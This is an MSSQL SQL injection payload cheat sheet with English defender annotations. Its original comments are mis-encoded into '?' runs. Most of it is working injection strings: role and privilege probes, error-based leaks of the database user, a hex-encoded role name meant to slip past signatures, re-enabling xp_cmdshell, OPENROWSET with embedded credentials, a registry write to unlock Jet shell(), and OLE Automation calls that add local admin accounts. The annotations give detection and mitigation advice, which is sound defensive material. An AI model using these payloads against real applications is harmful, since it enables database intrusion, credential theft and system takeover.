-- MSSQL injection probe cheat sheet (not a runnable script). Every line below is a
-- fragment meant to be appended to an attacker-controlled parameter; the non-ASCII
-- comment lines were mis-encoded to `?` runs and are kept verbatim. `%2B` is the
-- URL-encoded `+` (string concatenation in T-SQL).
-- Defender reading: all of these need two things to work -- string-built SQL and
-- feedback (boolean page difference or a raw conversion error returned to the
-- client). Parameterized queries remove the first; generic error pages remove the
-- second. The privilege probes (L2-L18) only matter if the app login is
-- over-privileged, which is what the later execution primitives depend on.
????//????????????
-- Database-role membership probe. Boolean form (`and 1=`) vs. error-based form:
-- char(124)=`|`, so `'|' + CAST(...) + '|' = 1` forces a varchar->int conversion
-- whose failure message echoes the value. Detection: conversion-failure errors
-- in application/DB logs originating from user-facing queries.
????and 1=(Select IS_MEMBER('db_owner'))
????And char(124)%2BCast(IS_MEMBER('db_owner') as varchar(1))%2Bchar(124)=1 ;--
????//???????ж????????????
-- Same pattern for cross-database access to `master`.
????and 1= (Select HAS_DBACCESS('master'))
????And char(124)%2BCast(HAS_DBACCESS('master') as varchar(1))%2Bchar(124)=1 --
????????????
-- Leaks the current database user name through the same conversion error.
-- Three context variants: numeric parameter, quoted string (`and ''='` closes
-- the literal), and LIKE pattern (`and '%'='`). A WAF rule keyed only on the
-- numeric shape misses the quoted ones.
????and char(124)%2Buser%2Bchar(124)=0
???????????
????' and char(124)%2Buser%2Bchar(124)=0 and ''='
????????????
????' and char(124)%2Buser%2Bchar(124)=0 and '%'='
???????????
-- Shorter user-name leak: comparing `user` (nvarchar) with an integer.
????and user>0
????' and user>0 and ''='
???????????SA???
-- Server-role probe (sysadmin). The second form passes the role name as a
-- hex literal (0x73007900... is UTF-16LE "sysadmin"), so a signature that
-- matches only the plain string 'sysadmin' does not fire on it.
????and 1=(select IS_SRVROLEMEMBER('sysadmin'));--
????And char(124)%2BCast(IS_SRVROLEMEMBER(0x730079006100640064006D0069006E00) as varchar(1))%2Bchar(124)=1 --
????????????MSSQL?????
-- Engine fingerprint: `sysobjects` exists only on SQL Server.
????and exists (select * from sysobjects);--
????????????????
-- Stacked-query check: if a trailing `;DECLARE ...` is accepted, everything
-- from L24 onward becomes reachable. Drivers/APIs that allow multiple
-- statements per call widen the blast radius of any injection.
????;declare @d int;--
??????? xp_cmdshell
-- Re-registers xp_cmdshell from xplog70.dll after it was dropped. Requires
-- sysadmin; removing the procedure is not a control on its own -- least
-- privilege for the application login is. Audit sp_addextendedproc calls.
????;exec master..dbo.sp_addextendedproc 'xp_cmdshell'??'xplog70.dll';--
-- Ad hoc linked connection with embedded credentials (OPENROWSET/sqloledb).
-- Needs 'Ad Hoc Distributed Queries' enabled; detection: outbound TCP/1433
-- from the SQL Server host to hosts that are not configured linked servers.
????select * from openrowset('sqloledb'??'server=192.168.1.200??1433;uid=test;pwd=pafpaf'??'select @@version')
????//-----------------------
????//      ???????
????//-----------------------
??????????????????
-- OS command execution via the Jet provider: xp_regwrite flips Jet's
-- SandBoxMode so that shell() is allowed inside a Jet query. Alert on
-- xp_regwrite usage at all, and on any write to the Jet Engines key.
????exec master..xp_regwrite 'HKEY_LOCAL_MACHINE'??'SOFTWAREMicrosoftJet4.0Engines'??'SandBoxMode'??'REG_DWORD'??1
???????????jet.oledb?????????
-- Jet OPENROWSET with an embedded shell() call (creates a local account).
-- Mitigation: do not leave the Jet/ACE OLE DB provider usable from the SQL
-- Server service, and keep ad hoc distributed queries disabled.
????select * from openrowset('microsoft.jet.oledb.4.0'??';database=c:winntsystem32iasias.mdb'??'select shell("cmd.exe /c net user admin admin1234 /add")')
???????????
-- OLE Automation path (sp_OACreate 'wscript.shell' + sp_OAMethod 'run').
-- Mitigation: sp_configure 'Ole Automation Procedures', 0; audit sp_OA* use.
????;DECLARE @shell INT EXEC SP_OAcreate 'wscript.shell'??@shell OUTPUT EXEC SP_OAMETHOD @shell??'run'??null?? 'C:WINNTsystem32cmd.exe /c net user paf pafpaf /add';--
-- Direct xp_cmdshell call. sp_configure 'xp_cmdshell', 0 blocks this form,
-- but see L24: a sysadmin-level login can re-enable it, so the durable
-- control is the privilege of the injected connection.
????EXEC [master].[dbo].[xp_cmdshell] 'cmd /c md c:1111'
?????ж?xp_cmdshell????洢???????????
-- Existence check: xtype = 'X' marks extended stored procedures in sysobjects.
-- The full URL here is the only line showing the carrier parameter (keyno).
????http://192.168.1.5/display.asp?keyno=188 and 1=(Select count(*) FROM master.dbo.sysobjects Where xtype = 'X' AND name = 'xp_cmdshell')